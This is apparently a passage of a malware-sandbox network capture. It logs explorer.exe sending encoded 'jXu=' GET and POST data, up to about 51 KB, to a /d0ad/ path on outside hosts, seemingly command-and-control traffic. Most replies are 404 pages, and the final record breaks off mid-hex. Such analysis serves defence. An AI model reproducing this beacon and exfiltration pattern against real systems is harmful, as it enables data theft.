Oct 26, 2022 13:16:16.752024889 CEST	471	OUT	Data Raw: 65 73 36 28 4d 75 36 30 79 6c 45 39 69 41 4a 4f 67 62 53 4a 6d 6e 76 6d 35 71 34 31 46 4f 59 33 56 53 36 4f 6e 53 37 66 70 64 6d 55 36 34 41 65 74 77 49 28 77 7e 39 71 35 33 4d 54 63 30 77 51 47 63 39 74 73 4c 51 4c 72 44 49 55 4f 59 76 59 70 73 Data Ascii: es6(Mu60ylE9iAJOgbSJmnvm5q41FOY3VS6OnS7fpdmU64AetwI(w~9q53MTc0wQGc9tsLQLrDIUOYvYpsPjHkiwSpL5lCPU5okzD5Qff8dPcQyE6SuA3aIlDppTHZoRsMHXvl4vWEP~9PGMc3Lxup79gW21pK2h2kvJsdHgEptBkq66-0pWpG9wAqTJWg6OrZvN499LWulIJofF_Cj(PXtBn1ffFYkmS32hCICnPYIQo6JABOX
Oct 26, 2022 13:16:16.752204895 CEST	479	OUT	Data Raw: 62 48 66 41 36 37 38 36 73 70 2d 31 4a 76 6d 6f 35 44 37 59 75 63 72 5a 49 6f 6b 58 70 7a 36 65 43 59 33 76 77 56 4d 54 6a 7e 4f 69 41 51 66 72 42 33 55 52 44 50 76 4c 71 41 41 39 5a 5a 55 59 52 66 4f 56 63 30 56 69 54 4d 6d 72 77 7a 79 55 5a 76 Data Ascii: bHfA6786sp-1Jvmo5D7YucrZIokXpz6eCY3vwVMTj~OiAQfrB3URDPvLqAA9ZZUYRfOVc0ViTMmrwzyUZvUPKREJVQQvI8KcxaiV3ySHK~ToylLQmYe~p0EepizSuLe7P7qQ800XZdOdMMMWjWdlfAATqkGLt0TgkvJnhavTinrKT19kezPCl(1q2gwn_inBDsgLCig7D(7Elh7kAZGMvzRA_KJp3UgL1Aqk6sQodsRINZhfV8z
Oct 26, 2022 13:16:16.752362013 CEST	481	OUT	Data Raw: 32 71 66 44 58 35 45 4e 71 70 58 59 6c 6d 57 62 7a 53 57 33 4a 7a 5a 42 46 4e 6e 31 31 39 57 65 48 53 32 61 36 77 7a 57 38 35 6b 65 53 4a 38 70 6c 6c 33 49 4b 4a 54 53 50 5a 78 6e 35 70 47 76 35 50 49 38 48 52 77 71 43 77 6f 69 6d 42 5f 47 72 6e Data Ascii: 2qfDX5ENqpXYlmWbzSW3JzZBFNn119WeHS2a6wzW85keSJ8pll3IKJTSPZxn5pGv5PI8HRwqCwoimB_GrnX0FvZDovJcSXxudtHwCO8BpdaN3F_rIjtxbuqTL2CQujMonqEai9OaHz8v76YZEjUTeE61Uq6XVhdOnlPSjQi1S(RlwdAILIumOgJzsblEa4qz7~Orsc0fRG63srF3PKCtj4YRJROfIB33crzex1_CVrj4iptKgcB
Oct 26, 2022 13:16:16.752537012 CEST	486	OUT	Data Raw: 51 70 56 4f 4b 45 73 37 49 7e 74 76 76 4a 56 43 63 6c 70 42 6c 50 68 52 36 79 73 55 42 59 30 51 7a 74 32 71 50 62 32 44 47 77 43 52 45 31 71 70 5f 44 70 7a 63 74 5f 55 6f 61 49 43 32 62 36 79 52 30 79 48 62 4a 4a 37 46 6f 43 76 32 55 64 58 73 6a Data Ascii: QpVOKEs7I~tvvJVCclpBlPhR6ysUBY0Qzt2qPb2DGwCRE1qp_Dpzct_UoaIC2b6yR0yHbJJ7FoCv2UdXsjMrOoJ4tUk2CtEDwk0oa3QISIDG84JHukWQdWWzCAnT037bi5B6ONo4JHwACjkFO41qV8htLlDWh4jLrhloJS6gfwK~rtkA0Ny6bov6T1PUNQJeXDyys~ehbW3Fj2GpxwgLt~kbqKtopzNgoBPNgUqYd20YyO-MDUK
Oct 26, 2022 13:16:16.752701998 CEST	489	OUT	Data Raw: 66 36 48 31 57 6e 42 52 74 4e 5a 78 63 33 42 39 6f 4d 65 33 71 43 70 75 62 5a 32 4a 2d 76 34 67 54 38 63 76 6a 53 38 54 79 71 42 41 70 51 38 56 79 55 4a 43 66 4e 71 68 6b 45 66 51 41 7e 4b 35 48 57 4e 5a 57 79 65 7e 6b 68 31 76 6d 30 4b 73 52 6f Data Ascii: f6H1WnBRtNZxc3B9oMe3qCpubZ2J-v4gT8cvjS8TyqBApQ8VyUJCfNqhkEfQA~K5HWNZWye~kh1vm0KsRo8wrxP2KF88CPdIIYeQST5mkr9yRx3Legb(mdDHiCWVuMsYN(s02(VZWcpwaQblW7sh-kALFYWxVJdsVkktSBKiIR4EsJGC_NK(lLTbb(1trPz~UiOtol0kSgEFPureIoyv-q6Gu2h66ykCFdD~u4tWt4P6wIhE76H
Oct 26, 2022 13:16:16.909425020 CEST	490	OUT	Data Raw: 63 4e 35 72 43 79 57 6b 58 46 78 67 35 45 51 58 33 71 51 48 49 34 59 41 32 77 73 6a 37 47 52 73 54 44 4a 4e 57 65 70 36 67 4e 76 41 34 6a 36 37 61 55 68 50 6b 68 6b 30 48 6f 47 49 4d 52 45 4c 7a 48 7a 57 61 51 43 32 5f 6d 76 35 49 39 57 56 42 4e Data Ascii: cN5rCyWkXFxg5EQX3qQHI4YA2wsj7GRsTDJNWep6gNvA4j67aUhPkhk0HoGIMRELzHzWaQC2_mv5I9WVBNjCWIIhyYumCFDswxInkLFYXEGWYcs~ygAVDoZeOZzd3auh12h1Q1UYyOz6sxykMz_(mMh6PA0X228CUxLwNqzgOR3eLQpwOFAtWhpCgjuXpjjcLscfJ12H4c_s4KQFnEfu78n7u(QXiAVuPbx0DFN8QKv6L2h~6vj
Oct 26, 2022 13:16:17.988826990 CEST	505	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:16 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49857	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:18.781186104 CEST	505	OUT	GET /d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.yumfechy.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:16:19.032238960 CEST	507	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:18 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49858	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:24.590591908 CEST	508	OUT	POST /d0ad/ HTTP/1.1 Host: www.sbgfoundation.net Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.sbgfoundation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sbgfoundation.net/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6e 6d 53 37 42 62 48 78 68 53 67 61 66 6d 79 55 68 46 61 4f 36 74 73 70 6e 34 61 32 65 34 66 79 46 62 62 43 61 53 38 62 52 42 32 45 6b 4f 39 49 78 69 58 69 68 48 52 73 68 32 68 6e 53 74 4d 37 77 30 59 4a 73 54 4d 69 62 4b 77 79 41 49 67 30 56 50 39 69 6d 77 5a 68 52 44 72 54 50 67 78 42 6c 39 75 31 4d 66 33 68 4b 45 38 38 6d 55 42 4f 52 48 72 32 71 57 32 43 72 79 35 74 74 5a 53 43 37 32 30 70 38 6d 41 53 44 39 55 4a 62 73 58 30 54 34 4e 66 39 4f 68 77 4c 53 55 50 28 52 56 30 39 51 46 43 6f 76 44 67 64 61 4e 77 30 57 4b 46 46 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=nmS7BbHxhSgafmyUhFaO6tspn4a2e4fyFbbCaS8bRB2EkO9IxiXihHRsh2hnStM7w0YJsTMibKwyAIg0VP9imwZhRDrTPgxBl9u1Mf3hKE88mUBORHr2qW2Cry5ttZSC720p8mASD9UJbsX0T4Nf9OhwLSUP(RV09QFCovDgdaNw0WKFFg).
Oct 26, 2022 13:16:24.753683090 CEST	508	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:24 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49859	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:26.762573004 CEST	510	OUT	POST /d0ad/ HTTP/1.1 Host: www.sbgfoundation.net Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.sbgfoundation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sbgfoundation.net/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6e 6d 53 37 42 62 48 78 68 53 67 61 65 48 43 55 6e 6d 79 4f 76 64 73 6f 69 34 61 32 58 59 66 2d 46 61 6e 43 61 58 63 78 51 33 4f 45 6b 71 78 49 77 68 50 69 6b 48 52 73 75 57 68 59 63 4e 4d 67 77 30 46 30 73 53 63 69 62 4b 6b 79 53 4e 73 30 45 66 39 6a 6f 51 59 54 42 54 72 57 4c 67 78 50 6c 39 79 54 4d 65 6a 68 4b 56 51 38 68 53 64 4f 57 57 72 31 38 47 33 4a 37 43 35 75 6b 35 53 32 37 32 34 58 38 69 45 6b 44 49 55 4a 63 4e 33 30 63 59 4e 63 6b 75 68 33 43 79 56 7a 79 7a 38 51 79 53 42 69 70 4f 50 35 62 70 4e 2d 31 6c 6a 57 51 58 33 5a 4a 43 66 39 62 45 52 57 71 55 57 41 33 6e 75 53 39 63 4c 68 4d 34 52 66 70 53 45 5a 6b 55 74 69 48 36 57 76 6d 56 6a 70 57 6e 56 31 48 38 71 30 5a 4e 54 51 71 4a 35 41 4a 52 65 48 77 41 54 5a 6d 48 34 50 4c 42 70 39 6e 46 51 66 39 6a 62 6c 4b 68 4e 74 53 66 7a 46 41 7a 61 77 30 50 79 35 73 6f 70 35 6e 54 6f 46 43 36 38 6f 6c 68 39 77 61 45 4f 58 79 6a 52 53 6d 68 52 70 38 50 45 32 4c 6e 6c 77 5a 43 50 6b 31 32 4c 42 69 63 71 76 38 32 52 68 79 59 54 32 79 77 71 75 50 34 55 57 43 6d 4d 6c 38 59 44 39 66 6e 71 48 4e 59 54 77 34 46 71 6a 28 63 6c 34 36 61 38 35 79 78 48 47 4f 4f 7a 43 53 44 4c 6c 35 41 37 5a 64 70 5a 6f 78 4f 42 56 69 71 4b 49 4b 41 77 62 38 52 59 70 54 65 72 39 43 4b 68 46 51 35 75 66 4d 31 47 58 4a 51 53 49 58 42 49 78 52 58 54 5f 38 47 61 55 62 2d 77 77 6d 49 45 52 4d 39 55 59 45 35 69 42 73 5f 48 2d 4b 43 78 34 4d 38 65 73 53 74 43 38 4d 78 6f 58 55 67 67 76 38 72 4b 54 6e 62 38 56 7a 52 73 2d 70 47 41 4c 48 35 37 79 49 6e 28 58 6e 39 54 49 55 67 76 64 6e 78 4b 67 41 56 74 79 31 4f 73 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=nmS7BbHxhSgaeHCUnmyOvdsoi4a2XYf-FanCaXcxQ3OEkqxIwhPikHRsuWhYcNMgw0F0sScibKkySNs0Ef9joQYTBTrWLgxPl9yTMejhKVQ8hSdOWWr18G3J7C5uk5S2724X8iEkDIUJcN30cYNckuh3CyVzyz8QySBipOP5bpN-1ljWQX3ZJCf9bERWqUWA3nuS9cLhM4RfpSEZkUtiH6WvmVjpWnV1H8q0ZNTQqJ5AJReHwATZmH4PLBp9nFQf9jblKhNtSfzFAzaw0Py5sop5nToFC68olh9waEOXyjRSmhRp8PE2LnlwZCPk12LBicqv82RhyYT2ywquP4UWCmMl8YD9fnqHNYTw4Fqj(cl46a85yxHGOOzCSDLl5A7ZdpZoxOBViqKIKAwb8RYpTer9CKhFQ5ufM1GXJQSIXBIxRXT_8GaUb-wwmIERM9UYE5iBs_H-KCx4M8esStC8MxoXUggv8rKTnb8VzRs-pGALH57yIn(Xn9TIUgvdnxKgAVty1Os.
Oct 26, 2022 13:16:26.930811882 CEST	510	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:26 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.11.20	49860	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:28.947889090 CEST	517	OUT	POST /d0ad/ HTTP/1.1 Host: www.sbgfoundation.net Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.sbgfoundation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sbgfoundation.net/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6e 6d 53 37 42 62 48 78 68 53 67 61 65 48 43 55 6e 6d 79 4f 76 64 73 6f 69 34 61 32 58 59 66 2d 46 61 6e 43 61 58 63 78 51 30 75 45 6b 5a 35 49 78 41 50 69 6e 48 52 73 77 6d 68 6a 63 4e 4e 79 77 30 4e 77 73 53 52 5a 62 49 63 79 53 39 63 30 45 74 46 6a 34 41 59 48 45 54 72 51 50 67 78 68 6c 39 75 48 4d 65 33 78 4b 45 30 38 6d 51 46 4f 52 68 58 32 28 57 32 43 37 43 35 69 7a 70 53 49 37 32 4d 48 38 69 49 6b 44 4f 55 4a 61 2d 50 30 51 72 6c 63 7e 4f 68 30 62 69 56 38 34 54 38 6c 79 57 68 51 70 4f 50 50 62 72 68 2d 31 6a 6a 57 52 55 50 65 4a 69 66 39 59 45 52 56 68 30 61 63 33 6e 7a 56 39 63 28 68 4d 2d 56 66 6d 53 45 5a 76 52 52 6c 44 61 57 70 31 46 6a 79 53 6e 49 32 48 38 7e 4b 5a 50 66 51 74 39 52 41 